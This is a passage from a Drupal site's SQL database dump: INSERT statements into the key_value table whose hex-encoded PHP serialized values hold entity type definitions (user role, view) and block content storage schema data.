3a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31323a22757365725f70696374757265223b4f3a33383a2244727570616c5c6669656c645c456e746974795c4669656c6453746f72616765436f6e666967223a33303a7b733a31353a22002a00656e74697479547970654964223b733a32303a226669656c645f73746f726167655f636f6e666967223b733a31353a22002a00656e666f72636549734e6577223b623a313b733a31323a22002a00747970656444617461223b4e3b733a31363a22002a006361636865436f6e7465787473223b613a303a7b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a31333a22002a006f726967696e616c4964223b733a31373a22757365722e757365725f70696374757265223b733a393a22002a00737461747573223b623a313b733a373a22002a0075756964223b733a33363a2230316431646566372d663565632d343365382d613533332d356330643233393238666563223b733a31313a22002a006c616e67636f6465223b733a323a22656e223b733a32333a22002a0074686972645f70617274795f73657474696e6773223b613a303a7b7d733a383a22002a005f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a223071382d6d7738792d4c73354935373873495051464c70346c6a70483757765659707a592d49394f2d3845223b7d733a31343a22002a007472757374656444617461223b623a313b733a31353a22002a00646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a333a7b693a303b733a343a2266696c65223b693a313b733a353a22696d616765223b693a323b733a343a2275736572223b7d7d733a31323a22002a00697353796e63696e67223b623a303b733a353a22002a006964223b733a31373a22757365722e757365725f70696374757265223b733a31333a22002a006669656c645f6e616d65223b733a31323a22757365725f70696374757265223b733a31343a22002a00656e746974795f74797065223b733a343a2275736572223b733a373a22002a0074797065223b733a353a22696d616765223b733a393a22002a006d6f64756c65223b733a353a22696d616765223b733a31313a22002a0073657474696e6773223b613a353a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b4e3b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a31343a22002a0063617264696e616c697479223b693a313b733a31353a22002a007472616e736c617461626c65223b623a313b733a393a22002a006c6f636b6564223b623a303b733a32353a22002a00706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b733a31303a22002a00696e6465786573223b613a313a7b733a393a227461726765745f6964223b613a313a7b693a303b733a393a227461726765745f6964223b7d7d733a31303a22002a0064656c65746564223b623a303b7d7d),
('entity.definitions.installed', 'user_role.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a393a22757365725f726f6c65223b733a383a22002a00636c617373223b733a32333a2244727570616c5c757365725c456e746974795c526f6c65223b733a31313a22002a0070726f7669646572223b733a343a2275736572223b733a31353a22002a007374617469635f6361636865223b623a313b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a393a7b733a323a226964223b733a323a226964223b733a363a22776569676874223b733a363a22776569676874223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a32333a2244727570616c5c757365725c456e746974795c526f6c65223b733a31313a22002a0068616e646c657273223b613a343a7b733a373a2273746f72616765223b733a32333a2244727570616c5c757365725c526f6c6553746f72616765223b733a363a22616363657373223b733a33363a2244727570616c5c757365725c526f6c65416363657373436f6e74726f6c48616e646c6572223b733a31323a226c6973745f6275696c646572223b733a32373a2244727570616c5c757365725c526f6c654c6973744275696c646572223b733a343a22666f726d223b613a323a7b733a373a2264656661756c74223b733a32303a2244727570616c5c757365725c526f6c65466f726d223b733a363a2264656c657465223b733a33353a2244727570616c5c436f72655c456e746974795c456e7469747944656c657465466f726d223b7d7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32323a2261646d696e6973746572207065726d697373696f6e73223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a343a7b733a31313a2264656c6574652d666f726d223b733a34353a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f7b757365725f726f6c657d2f64656c657465223b733a393a22656469742d666f726d223b733a33383a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f7b757365725f726f6c657d223b733a32313a22656469742d7065726d697373696f6e732d666f726d223b733a33373a222f61646d696e2f70656f706c652f7065726d697373696f6e732f7b757365725f726f6c657d223b733a31303a22636f6c6c656374696f6e223b733a31393a222f61646d696e2f70656f706c652f726f6c6573223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a22526f6c65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a22526f6c6573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a22726f6c65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a22726f6c6573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31313a2240636f756e7420726f6c65223b733a363a22706c7572616c223b733a31323a2240636f756e7420726f6c6573223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a32313a22636f6e6669673a757365725f726f6c655f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a343a22726f6c65223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a353a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a363a22776569676874223b693a333b733a383a2269735f61646d696e223b693a343b733a31313a227065726d697373696f6e73223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'view.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a343a2276696577223b733a383a22002a00636c617373223b733a32343a2244727570616c5c76696577735c456e746974795c56696577223b733a31313a22002a0070726f7669646572223b733a353a227669657773223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a393a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a363a22737461747573223b733a363a22737461747573223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a32343a2244727570616c5c76696577735c456e746974795c56696577223b733a31313a22002a0068616e646c657273223b613a323a7b733a363a22616363657373223b733a34353a2244727570616c5c436f72655c456e746974795c456e74697479416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31363a2261646d696e6973746572207669657773223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a303a7b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2256696577223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31363a225669657720656e746974792074797065223b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a225669657773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31363a225669657720656e746974792074797065223b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2276696577223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31363a225669657720656e746974792074797065223b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a227669657773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31363a225669657720656e746974792074797065223b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31313a2240636f756e742076696577223b733a363a22706c7572616c223b733a31323a2240636f756e74207669657773223b733a373a22636f6e74657874223b733a31363a225669657720656e746974792074797065223b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a31363a22636f6e6669673a766965775f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b4e3b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a383a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a363a226d6f64756c65223b693a333b733a31313a226465736372697074696f6e223b693a343b733a333a22746167223b693a353b733a31303a22626173655f7461626c65223b693a363b733a31303a22626173655f6669656c64223b693a373b733a373a22646973706c6179223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.storage_schema.sql', 'block_content.entity_schema_data', 0x613a343a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a323a226964223b7d733a31313a22756e69717565206b657973223b613a313a7b733a32363a22626c6f636b5f636f6e74656e745f5f7265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d7d7d733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a373a22696e6465786573223b613a313a7b733a31373a22626c6f636b5f636f6e74656e745f5f6964223b613a313a7b693a303b733a323a226964223b7d7d7d733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a323a226964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a34353a22626c6f636b5f636f6e74656e745f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a323a226964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d733a32363a22626c6f636b5f636f6e74656e745f5f7265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32363a22626c6f636b5f636f6e74656e745f5f7374617475735f74797065223b613a333a7b693a303b733a363a22737461747573223b693a313b733a343a2274797065223b693a323b733a323a226964223b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a31313a227265766973696f6e5f6964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a313a7b733a34353a22626c6f636b5f636f6e74656e745f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a323a226964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.body', 0x613a323a7b733a31393a22626c6f636b5f636f6e74656e745f5f626f6479223b613a343a7b733a31313a226465736372697074696f6e223b733a34323a22446174612073746f7261676520666f7220626c6f636b5f636f6e74656e74206669656c6420626f64792e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31303a22626f64795f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a313b7d733a31323a22626f64795f73756d6d617279223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a31313a22626f64795f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a31313a22626f64795f666f726d6174223b613a313a7b693a303b733a31313a22626f64795f666f726d6174223b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f7265766973696f6e5f5f626f6479223b613a343a7b733a31313a226465736372697074696f6e223b733a35343a225265766973696f6e20617263686976652073746f7261676520666f7220626c6f636b5f636f6e74656e74206669656c6420626f64792e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31303a22626f64795f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a313b7d733a31323a22626f64795f73756d6d617279223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a31313a22626f64795f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a31313a22626f64795f666f726d6174223b613a313a7b693a303b733a31313a22626f64795f666f726d6174223b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.changed', 0x613a323a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.content_translation_created', 0x613a323a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32373a22636f6e74656e745f7472616e736c6174696f6e5f63726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32373a22636f6e74656e745f7472616e736c6174696f6e5f63726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.content_translation_outdated', 0x613a323a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.content_translation_source', 0x613a323a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32363a22636f6e74656e745f7472616e736c6174696f6e5f736f75726365223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32363a22636f6e74656e745f7472616e736c6174696f6e5f736f75726365223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.content_translation_uid', 0x613a323a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a32333a22636f6e74656e745f7472616e736c6174696f6e5f756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a32353a22626c6f636b5f636f6e74656e745f5f61326465373766326661223b613a313a7b693a303b733a32333a22636f6e74656e745f7472616e736c6174696f6e5f756964223b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a313a7b733a32333a22636f6e74656e745f7472616e736c6174696f6e5f756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a32353a22626c6f636b5f636f6e74656e745f5f61326465373766326661223b613a313a7b693a303b733a32333a22636f6e74656e745f7472616e736c6174696f6e5f756964223b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.default_langcode', 0x613a323a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.id', 0x613a343a7b733a31333a22626c6f636b5f636f6e74656e74223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7